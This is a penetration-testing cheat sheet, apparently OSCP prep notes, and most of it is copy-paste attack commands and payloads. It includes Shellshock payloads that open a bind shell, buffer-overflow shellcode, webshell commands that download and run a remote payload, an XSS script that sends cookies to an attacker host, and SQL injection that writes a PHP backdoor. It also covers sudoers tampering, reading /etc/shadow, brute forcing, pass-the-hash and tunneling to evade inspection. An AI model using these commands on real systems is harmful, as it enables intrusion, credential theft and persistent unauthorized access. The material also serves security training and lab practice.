https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
- Compiling Windows Exploits on Kali
- wget -O mingw-get-setup.exe
http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
- cd /root/.wine/drive\_c/windows
wget http://gojhonny.com/misc/mingw\_bin.zip && unzip
mingw\_bin.zip
cd /root/.wine/drive\_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
- Cross Compiling Exploits
- gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
- Shellshock
- git clone <https://github.com/nccgroup/shocker>
- ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c
/cgi-bin/status --verbose
- Shell Shock SSH Forced Command
Check for forced command by enabling all debug output with ssh
ssh -vvv
ssh -i noob noob@$ip '() { :;}; /bin/bash'
- cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {
:;}; echo \\$(</etc/passwd)\\r\\nHost:
vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
- Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {
:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:
vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
- Shell Shock reverse Shell
nc -l -p 443
- Buffer Overflow Exploits
- Pass 1000 A’s as a parameter
./r00t $(python -c 'print "A" \* 1000')
- Random Pattern Create
/usr/share/metasploit-framework/tools\# ruby pattern\_create.rb
1000
- Determine Pattern offset
ruby pattern\_offset.rb 0x6a413969
- Pass shell with offset value
env - ./r00t $(python -c 'print "A"\*268 +
"\\x80\\xfc\\xff\\xbf" + "\\x90"\*16 +
"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80"')
\# id
- From Fuzzing to Zero Day
https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/
- Nmap Fuzzers:
- NMap Fuzzer List
[*https://nmap.org/nsedoc/categories/fuzzer.html*](https://nmap.org/nsedoc/categories/fuzzer.html)
- NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args
'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'
-p 80 $ip
- Nmap DNS Fuzzer
nmap --script dns-fuzz --script-args timelimit=2h $ip -d
File Transfers
============================================================================================================
- Post exploitation refers to the actions performed by an attacker,
once some level of control has been gained on his target.
- Simple Local Web Servers
- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
- Run a basic Python3 http server, great for serving up shells
etc
python3 -m http.server
- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
- Run a basic PHP http server
php -S $ip:80
- Creating a wget VB Script on Windows:
[*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
- Mounting File Shares
- Mount NFS share to /mnt/nfs
mount $ip:/vol/share /mnt/nfs
- HTTP Put
nmap -p80 $ip --script http-put --script-args
http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
- Uploading Files
-------------------------------------------------------------------------------------------------------------
- SCP
scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
scp localfile username@$ip:~/Folder/
- Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
`davtest -move -sendbd auto -url http://$ip`
https://github.com/cldrn/davtest
You can also upload a file using the PUT method with the curl command:
`curl -T 'leetshellz.txt' 'http://$ip'`
And rename it to an executable file using the MOVE method with the curl command:
`curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
- Upload shell using limited php shell cmd
use the webshell to download and execute the meterpreter
\[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O
/tmp/evil" http://$ip/files/sh.php
\[curl -s --data "cmd=chmod 777 /tmp/evil"
http://$ip/files/sh.php
curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
- TFTP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
EX. FROM WINDOWS HOST:
C:\\Users\\Offsec>tftp -i $ip get nc.exe
- FTP
apt-get update && apt-get install pure-ftpd
\#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
- Packing Files
-------------------------------------------------------------------------------------------------------------
- Ultimate Packer for eXecutables
upx -9 nc.exe
- exe2bat - Converts EXE to a text file that can be copied and
pasted
locate exe2bat
wine exe2bat.exe nc.exe nc.txt
- Veil - Evasion Framework -
https://github.com/Veil-Framework/Veil-Evasion
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Privilege Escalation
==================================================================================================================
- Linux Privilege Escalation
------------------------------------------------------------------------------------------------------------------------
- Try the obvious - Maybe the user can sudo to root:
sudo su
- Highon.coffee Linux Local Enum
`wget https://highon.coffee/downloads/linux-local-enum.sh`
- Basic Linux Privilege Escalation
[*https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/*](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
- Linux Privilege Exploit Suggester
[*https://github.com/PenturaLabs/Linux\_Exploit\_Suggester*](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
- Linux post exploitation enumeration and exploit checking tools
[*https://github.com/reider-roque/linpostexp*](https://github.com/reider-roque/linpostexp)
- CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
[*https://www.exploit-db.com/exploits/15285/*](https://www.exploit-db.com/exploits/15285/)
- CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo
/ Ubuntu x86/x64)
[*https://git.zx2c4.com/CVE-2012-0056/about/*](https://git.zx2c4.com/CVE-2012-0056/about/)
Linux CVE 2012-0056
wget -O exploit.c <http://www.exploit-db.com/download/18411>
gcc -o mempodipper exploit.c
./mempodipper
- CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux
Kernel <= 3.19.0-73.8
[*https://dirtycow.ninja/*](https://dirtycow.ninja/)
First existed on 2.6.22 (released in 2007) and was fixed on Oct 18,
2016
./cow32
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
- Run a command as a user other than root
sudo -u waldo /usr/bin/vim
/etc/apache2/sites-available/000-default.conf
- Add a user or change a password
/usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor
echo thePassword | passwd haxzor --stdin
- Local Privilege Escalation Exploit in Linux
- **SUID** (**S**et owner **U**ser **ID** up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.
below are some quick copy and paste examples for various
shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
- Create and compile an SUID from a limited shell (no file
transfer)
echo "int main(void){\\nsetgid(0);
setuid(0);\\nsystem(\\"/bin/sh\\");\\n}" >privsc.c
gcc privsc.c -o privsc
- Add users to Root SUDO group with no password requirement
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:
ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' >
/tmp/update
- SearchSploit
searchsploit –uncsearchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
searchsploit slmail
- Kernel Exploit Suggestions for Kernel Version 3.0.0
./usr/share/linux-exploit-suggester/Linux\_Exploit\_Suggester.pl -k 3.0.0
- Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***
[*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
- Collect root password
cat /etc/shadow |grep root
- Find and display the proof.txt or flag.txt - LOOT!
`cat ``find / -name proof.txt -print```
- Windows Privilege Escalation
--------------------------------------------------------------------------------------------------------------------------
- Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html
- Try the getsystem command using meterpreter - rarely works but is worth a try.
`meterpreter > getsystem`
- Metasploit Meterpreter Privilege Escalation Guide
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
- Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP
- Powershell Priv Escalation Tools
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- Windows Service Configuration Viewer - Check for misconfigurations
in services that can lead to privilege escalation. You can replace
the executable with your own and have windows execute whatever code
you want as the privileged user.
icacls scsiaccess.exe
> scsiaccess.exe
> NT AUTHORITY\\SYSTEM:(I)(F)
> BUILTIN\\Administrators:(I)(F)
> BUILTIN\\Users:(I)(RX)
> APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)
> Everyone:(I)(F)
- Compile a custom add user command in windows using C
root@kali:~\# cat useradd.c
\#include <stdlib.h> /\* system, NULL, EXIT\_FAILURE \*/
int main ()
{
int i;
i=system ("net localgroup administrators low /add");
return 0;
}
i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
- Group Policy Preferences (GPP)
A common useful misconfiguration found in modern domain environments
is unprotected Windows GPP settings files
- map the Domain controller SYSVOL share
net use z: \\\\dc01\\SYSVOL
- Find the GPP file: Groups.xml
dir /s Groups.xml
- Review the contents for passwords
type Groups.xml
- Decrypt using GPP Decrypt
gpp-decrypt
riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
- Find and display the proof.txt or flag.txt - get the loot!
`#meterpreter > run post/windows/gather/win_privs`
`cd\ & dir /b /s proof.txt`
`type c:\pathto\proof.txt`
Client, Web and Password Attacks
==============================================================================================================================
- <span id="_pcjm0n4oppqx" class="anchor"><span id="_Toc480741817" class="anchor"></span></span>Client Attacks
------------------------------------------------------------------------------------------------------------
- MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html
<http://www.exploit-db.com/download/24017>
service apache2 start
- JAVA Signed Jar client side attack
echo '<applet width="1" height="1" id="Java Secure"
code="Java.class" archive="SignedJava.jar"><param name="1"
value="http://$ip:80/evil.exe"></applet>' >
/var/www/html/java.html
User must hit run on the popup that occurs.
- Linux Client Shells
[*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)
- Setting up the Client Side Exploit
- Swapping Out the Shellcode
- Injecting a Backdoor Shell into Plink.exe
backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip
-P 4444 -s reverse\_shell\_tcp
- <span id="_n6fr3j21cp1m" class="anchor"><span id="_Toc480741818" class="anchor"></span></span>Web Attacks
---------------------------------------------------------------------------------------------------------
- Web Shag Web Application Vulnerability Assessment Platform
webshag-gui
- Web Shells
[*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)
ls -l /usr/share/webshells/
- Generate a PHP backdoor (generate) protected with the given
password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
- Java Signed Applet Attack
- HTTP / HTTPS Webserver Enumeration
- OWASP Dirbuster
- nikto -h $ip
- Essential Iceweasel Add-ons
Cookies Manager
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
- Cross Site Scripting (XSS)
significant impacts, such as cookie stealing and authentication
bypass, redirecting the victim’s browser to a malicious HTML
page, and more
- Browser Redirection and IFRAME Injection
<iframe SRC="http://$ip/report" height = "0" width
="0"></iframe>
- Stealing Cookies and Session Information
<script>
new
image().src="http://$ip/bogus.php?output="+document.cookie;
</script>
nc -nlvp 80
- File Inclusion Vulnerabilities
-----------------------------------------------------------------------------------------------------------------------------
- Local (LFI) and remote (RFI) file inclusion vulnerabilities are
commonly found in poorly written PHP code.
- fimap - There is a Python tool called fimap which can be
leveraged to automate the exploitation of LFI/RFI
vulnerabilities that are found in PHP (sqlmap for LFI):
[*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)
- Gaining a shell from phpinfo()
fimap + phpinfo() Exploit - If a phpinfo() file is present,
it’s usually possible to get a shell, if you don’t know the
location of the phpinfo file fimap can probe for it, or you
could use a tool like OWASP DirBuster.
- For Local File Inclusions look for the include() function in PHP
code.
include("lang/".$\_COOKIE\['lang'\]);
include($\_GET\['page'\].".php");
- LFI - Encode and Decode a file using base64
curl -s
http://$ip/?page=php://filter/convert.base64-encode/resource=index
| grep -e '\[^\\ \]\\{40,\\}' | base64 -d
- LFI - Download file with base 64 encoding
[*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)
- LFI Linux Files:
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash\_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
- LFI Windows Files:
%SYSTEMROOT%\\repair\\system
%SYSTEMROOT%\\repair\\SAM
%SYSTEMROOT%\\repair\\SAM
%WINDIR%\\win.ini
%SYSTEMDRIVE%\\boot.ini
%WINDIR%\\Panther\\sysprep.inf
%WINDIR%\\system32\\config\\AppEvent.Evt
- LFI OSX Files:
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
- LFI - Download passwords file
[*http://$ip/index.php?page=/etc/passwd*](about:blank)
[*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)
- LFI - Download passwords file with filter evasion
[*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)
- Local File Inclusion - In versions of PHP below 5.3 we can
terminate with null byte
GET
/addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
- Contaminating Log Files <?php echo
shell\_exec($\_GET\['cmd'\]);?>
- For a Remote File Inclusion look for php code that is not
sanitized and passed to the PHP include function and the php.ini
file must be configured to allow remote files
/etc/php5/cgi/php.ini - “allow\_url\_fopen” and
“allow\_url\_include both set to “on”
include($\_REQUEST\["file"\].".php");
- Remote File Inclusion
[http://$ip/addguestbook.php?name=a&comment=b&LANG=http://$localip/evil.txt](http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt)
<?php echo shell\_exec("ipconfig");?>
- <span id="_mgu7e3u7svak" class="anchor"><span id="_Toc480741820" class="anchor"></span></span>Database Vulnerabilities
----------------------------------------------------------------------------------------------------------------------
- MySQL SQL
- Grab password hashes from a web application mysql database
called “Users” - once you have the MySQL root username and
password
mysql -u root -p -h $ip
use "Users"
show tables;
select \* from users;
- Authentication Bypass
name='wronguser' or 1=1;\#
name='wronguser' or 1=1 LIMIT 1;\#
- Enumerating the Database
[http://$ip/comment.php?id=738](http://192.168.11.35/comment.php?id=738)’
Verbose error message?
http://$ip/comment.php?id=738 order by 1
http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6
Determine MySQL Version:
http://$ip/comment.php?id=738 union all select
1,2,3,4,@@version,6
current user being used for the database connection
http://$ip/comment.php?id=738 union all select
1,2,3,4,user(),6
we can enumerate database tables and column structures
http://$ip/comment.php?id=738 union all select
1,2,3,4,table\_name,6 FROM information\_schema.tables
target the users table in the database
http://$ip/comment.php?id=738 union all select
1,2,3,4,column\_name,6 FROM information\_schema.columns where
table\_name='users'
extract the name and password
http://$ip/comment.php?id=738 union select
1,2,3,4,concat(name,0x3a, password),6 FROM users
Create a backdoor
http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php
echo shell\_exec($\_GET\['cmd'\]);?>",6 into OUTFILE
'c:/xampp/htdocs/backdoor.php'
- SQLMap Examples
- Crawl the links
sqlmap -u http://$ip --crawl=1
sqlmap -u http://meh.com --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3
- SQLMap Search for databases against a suspected GET SQL Injection
point ‘search’**
sqlmap –u http://$ip/blog/index.php?search –dbs
- SQLMap dump tables from database oscommerce at GET SQL injection point ‘search’
sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables
–dumps
- SQLMap GET Parameter command
sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump
-threads=5
- SQLMap Post Username parameter
sqlmap -u http://$ip/login.php --method=POST
--data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3
--level=5 --dbms=MySQL --dump-all
- SQL Map OS Shell
sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell
sqlmap -u http://$ip/login.php --method=POST
--data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3
--level=5 --dbms=MySQL --os-shell
- Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php"
- Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
- Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
sqlmap -o -u http://$ip/index.php --forms --dbs
sqlmap -o -u "http://$ip/form/" --forms
sqlmap check form for injection
sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump
sqlmap dump and crack hashes for table users on database-name.
Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
Enumerate tables from a specific database
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
Dump table data from a specific database and table
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Specify parameter to exploit
sqlmap --dbms=mysql -u
"http://www.example.com/param1=value1¶m2=value2" --dbs -p param2
Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u
"http://www.example.com/param1/value1\*/param2/value2" --dbs \#
exploits param1
Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell
Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell
SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT \*
FROM $TABLE;"
Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL"
--dbs
- Password Attacks
--------------------------------------------------------------------------------------------------------------
- AES Decryption
http://aesencryption.net/
- Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do curl
http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
webapp.txt ; done
- Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict
- Default Usernames and Passwords
- CIRT
[*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
- Government Security - Default Logins and Passwords for
Networked Devices
- [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
- Virus.org
[*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
- Default Password
[*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
- Brute Force
- Nmap Brute forcing Scripts
[*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
- Nmap Generic auto detect brute force attack
nmap --script brute -Pn <target.com or ip>
<enter>
- MySQL nmap brute force attack
nmap --script=mysql-brute $ip
- Dictionary Files
- Word lists on Kali
cd /usr/share/wordlists
- Key-space Brute Force
- crunch 6 6 0123456789ABCDEF -o crunch1.txt
- crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
- crunch 8 8 -t ,@@^^%%%
- Pwdump and Fgdump - Security Accounts Manager (SAM)
- pwdump.exe - attempts to extract password hashes
- fgdump.exe - attempts to kill local antiviruses before
attempting to dump the password hashes and
cached credentials.
- Windows Credential Editor (WCE)
- allows one to perform several attacks to obtain clear text
passwords and hashes
- wce -w
- Mimikatz
- extract plaintexts passwords, hash, PIN code and kerberos
tickets from memory. mimikatz can also perform
pass-the-hash, pass-the-ticket or build Golden tickets
[*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
From metasploit meterpreter (must have System level access):
`meterpreter> load mimikatz
meterpreter> help mimikatz
meterpreter> msv
meterpreter> kerberos
meterpreter> mimikatz_command -f samdump::hashes
meterpreter> mimikatz_command -f sekurlsa::searchPasswords`
- Password Profiling
- cewl can generate a password list from a web page
`cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
- Password Mutating
- John the ripper can mutate password lists
nano /etc/john/john.conf
`john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
- Medusa
- Medusa, initiated against an htaccess protected web
directory
`medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
- Ncrack
- ncrack (from the makers of nmap) can brute force RDP
`ncrack -vv --user offsec -P password-file.txt rdp://$ip`
- Hydra
- Hydra brute force against SNMP
`hydra -P password-file.txt -v $ip snmp`
- Hydra FTP known user and password list
`hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`
- Hydra SSH using list of users and passwords
`hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
- Hydra SSH using a known password and a username list
`hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh`
- Hydra SSH Against Known username on port 22
`hydra $ip -s 22 ssh -l <user> -P big\_wordlist.txt`
- Hydra POP3 Brute Force
`hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`
- Hydra SMTP Brute Force
`hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`
- Hydra attack http get 401 login with a dictionary
`hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
- Hydra attack Windows Remote Desktop with rockyou
`hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
- <span id="_bnmnt83v58wk" class="anchor"><span id="_Toc480741822" class="anchor"></span></span>Password Hash Attacks
-------------------------------------------------------------------------------------------------------------------
- Online Password Cracking
[*https://crackstation.net/*](https://crackstation.net/)
- Hashcat running on
- Sample Hashes
[*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
- Identify Hashes
hash-identifier
- Crask linux hashes you must first unshadow them:
unshadow passwd-file.txt shadow-file.txt
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
- John the Ripper - Password Hash Cracking
- john $ip.pwdump
- john --wordlist=/usr/share/wordlists/rockyou.txt hashes
- john --rules --wordlist=/usr/share/wordlists/rockyou.txt
- john --rules --wordlist=/usr/share/wordlists/rockyou.txt
unshadowed.txt
- JTR forced descrypt cracking with wordlist
john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt
- JTR forced descrypt brute force cracking
john --format=descrypt hash --show
- Passing the Hash in Windows
- Use Metasploit to exploit one of the SMB servers in the labs.
Dump the password hashes and attempt a pass-the-hash attack
against another system:
export
SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U administrator //$ip cmd
<span id="_6nmbgmpltwon" class="anchor"><span id="_Toc480741823" class="anchor"></span></span>Networking, Pivoting and Tunneling
================================================================================================================================
- Port Forwarding - accept traffic on a given IP address and port and
redirect it to a different IP address and port
- apt-get install rinetd
- cat /etc/rinetd.conf
\# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
- SSH Local Port Forwarding: supports bi-directional communication
channels
- ssh <gateway> -L <local port to listen>:<remote
host>:<remote port>
- SSH Remote Port Forwarding: Suitable for popping a remote shell on
an internal non routable network
- ssh <gateway> -R <remote port to bind>:<local
host>:<local port>
- SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
network on ANY PORT
- ssh -D <local proxy port> -p <remote port>
<target>
- Proxychains - Perform nmap scan within a DMZ from an external
computer
- Create reverse SSH tunnel from Popped machine on :2222
ssh -f -N -R 2222:$ip:22 root@$ip
- Create a Dynamic application-level port forward on 8080 thru
2222
ssh -f -N -D $ip:8080 -p 2222 hax0r@$ip
- Leverage the SSH SOCKS server to perform Nmap scan on network
using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
- HTTP Tunneling
nc -vvn $ip 8888
- Traffic Encapsulation - Bypassing deep packet inspection
- http\_tunnel
On server side:
sudo hts -F <server\_ip\_addr>:<port\_of\_your\_app>
80
On client side:
sudo htc -P <my\_proxy.com:proxy\_port> -F
<port\_of\_your\_app> <server\_ip\_addr>:80
stunnel
- Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
network
- Tunnel on port 22
plink -l root -pw pass -R 3389:$ip:3389 $ip
- Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P
80
- Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
(bypass deep packet inspection)
- Windows machine add required firewall rules without prompting
the user
- netsh advfirewall firewall add rule name="httptunnel\_client"
dir=in action=allow program="httptunnel\_client.exe" enable=yes
- netsh advfirewall firewall add rule name="3000" dir=in
action=allow protocol=TCP localport=3000
- netsh advfirewall firewall add rule name="1080" dir=in
action=allow protocol=TCP localport=1080
- netsh advfirewall firewall add rule name="1079" dir=in
action=allow protocol=TCP localport=1079
- Start the http tunnel client
httptunnel\_client.exe
- Create HTTP reverse shell by connecting to localhost port 3000
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P
3000
- VLAN Hopping
- git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
- VPN Hacking
- Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip
- Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt
- Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone <https://github.com/SpiderLabs/ikeforce.git>
Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w
passwords.txt -s 1
Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP
Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5
--charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
- PPTP Hacking
- Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
- Port Forwarding/Redirection
- PuTTY Link tunnel - SSH Tunneling
- Forward remote port to local address:
plink.exe -P 22 -l root -pw "1337" -R 445:$ip:445 $ip
- SSH Pivoting
- SSH pivoting from one network to another:
ssh -D $ip:1010 -p 22 user@$ip
- DNS Tunneling
- dnscat2 supports “download” and “upload” commands for getting
files (data and programs) to and from the target machine.
- Attacking Machine Installation:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
- Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
- Target Machine:
https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell/
dnscat --host <dnscat server\_ip>
<span id="_ujpvtdpc9i67" class="anchor"><span id="_Toc480741824" class="anchor"></span></span>The Metasploit Framework
======================================================================================================================
- See [*Metasploit Unleashed
Course*](https://www.offensive-security.com/metasploit-unleashed/)
in the Essentials
- Search for exploits using Metasploit GitHub framework source code:
[*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
Translate them for use on OSCP LAB or EXAM.
- Metasploit
- MetaSploit requires Postfresql
systemctl start postgresql
- To enable Postgresql on startup
systemctl enable postgresql
- MSF Syntax
- Start metasploit
msfconsole
msfconsole -q
- Show help for command
show -h
- Show Auxiliary modules
show auxiliary
- Use a module
use auxiliary/scanner/snmp/snmp\_enum
use auxiliary/scanner/http/webdav\_scanner
use auxiliary/scanner/smb/smb\_version
use auxiliary/scanner/ftp/ftp\_login
use exploit/windows/pop3/seattlelab\_pass
- Show the basic information for a module
info
- Show the configuration parameters for a module
show options
- Set options for a module
set RHOSTS $ip-254
set THREADS 10
- Run the module
run
- Execute an Exploit
exploit
- Search for a module
search type:auxiliary login
- Metasploit Database Access
- Show all hosts discovered in the MSF database
hosts
- Scan for hosts and store them in the MSF database
db\_nmap
- Search machines for specific ports in MSF database
services -p 443
- Leverage MSF database to scan SMB ports (auto-completed
rhosts)
services -p 443 --rhosts
- Staged and Non-staged
- Non-staged payload - is a payload that is sent in its entirety
in one go
- Staged - sent in two parts
